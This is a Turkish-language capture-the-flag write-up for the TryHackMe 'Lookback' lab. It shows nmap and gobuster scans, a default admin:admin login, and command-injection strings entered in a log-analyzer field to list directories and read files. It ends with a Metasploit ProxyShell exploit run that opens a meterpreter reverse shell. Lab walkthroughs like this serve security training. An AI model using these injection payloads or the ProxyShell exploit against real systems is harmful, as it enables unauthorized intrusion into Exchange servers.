TryHackMe – Lookback Makine Çözümü

Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Lookback” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…

Çözüm

1 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.

[root:/home/alper/Desktop/TRYHACKME]# nmap -sS -sV 10.10.153.32
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-08 11:59 +03
Nmap scan report for 10.10.153.32
Host is up (0.066s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
443/tcp  open  ssl/https
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

2 — Dizin taraması yapıyorum.

[root:/home/alper/Desktop/TRYHACKME]# gobuster dir -k -u https://10.10.153.32 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt –exclude-length 0
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://10.10.153.32
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Exclude Length: 0
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/08 12:01:26 Starting gobuster in directory enumeration mode
===============================================================
/test (Status: 401) [Size: 1293]

3 — Test dizinine “admin:admin” bilgileri ile giriş yapıyorum. Sonra ilk bayrağımı elde ediyorum. Arama yerine “BitlockerActiveMonitoringLogs” yazdığımız zaman verilen logu analiz eden bir program olduğunu görüyorum. “BitlockerActiveMonitoringLogs’); dir #(‘“ yazarak filteri atlatarak mevcut dizindeki dosyaları görüntülüyorum.

# 

This interface should be removed on production!
*CENSORED*

**LOG ANALYZER**

Path: 

List generated at 8:45:25 AM.


    Directory: C:\windows\system32\inetsrv


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        1/25/2023   1:35 PM                backup                                                                
d-----        1/25/2023  12:12 PM                Config                                                                
d-----        1/25/2023  12:12 PM                en                                                                    
d-----        1/25/2023   1:04 PM                en-US                                                                 
d-----         6/8/2023   1:45 AM                History                                                               
d-----        1/25/2023  12:44 PM                MetaBack                                                              
-a----        1/25/2023  12:44 PM         252928 abocomp.dll                                                           
-a----        1/25/2023  12:44 PM         324608 adsiis.dll                                                            
-a----        1/25/2023  12:12 PM         119808 appcmd.exe                                                            
-a----        9/15/2018  12:14 AM           3810 appcmd.xml                                                            
-a----        1/25/2023  12:12 PM         181760 AppHostNavigators.dll                                                 
-a----        1/25/2023  12:11 PM          80896 apphostsvc.dll                                                        
-a----        1/25/2023  12:12 PM         406016 appobj.dll

4 — Bu serviste Microsoft Exchange proxyshell uygulaması çalışıyor. Arama yerine “BitlockerActiveMonitoringLogs’); type C:\Users\dev\Desktop\user.txt #(‘ “ giriyorum. Böylece log dosyasından kaçıp ikinci bayrağımı da okuyabiliyorum.

List generated at 8:45:25 AM.
*CENSORED*

5 — Dizinler arasında gezinirken “dev” kullanıcısının masaüstünde “TODO.txt” adında bir dosya buluyorum. Bu dosyada çeşitli mail adresleri yazıyor.

## BitlockerActiveMonitoringLogs'); type C:\Users\dev\Desktop\TODO.txt #('

List generated at 8:45:25 AM.
Hey dev team,

This is the tasks list for the deadline:

Promote Server to Domain Controller [DONE]
Setup Microsoft Exchange [DONE]
Setup IIS [DONE]
Remove the log analyzer[TO BE DONE]
Add all the users from the infra department [TO BE DONE]
Install the Security Update for MS Exchange [TO BE DONE]
Setup LAPS [TO BE DONE]


When you are done with the tasks please send an email to:

joe@thm.local
carol@thm.local
and do not forget to put in CC the infra team!
*CENSORED*@thm.local

6 — msfconsole aracından “exploit/windows/http/exchange_proxyshell_rce” modülü kullanarak shell elde ediyorum. Administrator kullancısı ile ikinci bayrağı da elde ediyorum.

msf6 > use exploit/windows/http/exchange_proxyshell_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/exchange_proxyshell_rce) > show options 
*
*
msf6 exploit(windows/http/exchange_proxyshell_rce) > set EMAIL *CENSORED*
*
msf6 exploit(windows/http/exchange_proxyshell_rce) > run
*
*
meterpreter > shell
c:\windows\system32\inetsrv>type C:\Users\Administrator\Documents\flag.txt
type C:\Users\Administrator\Documents\flag.txt
*CENSORED*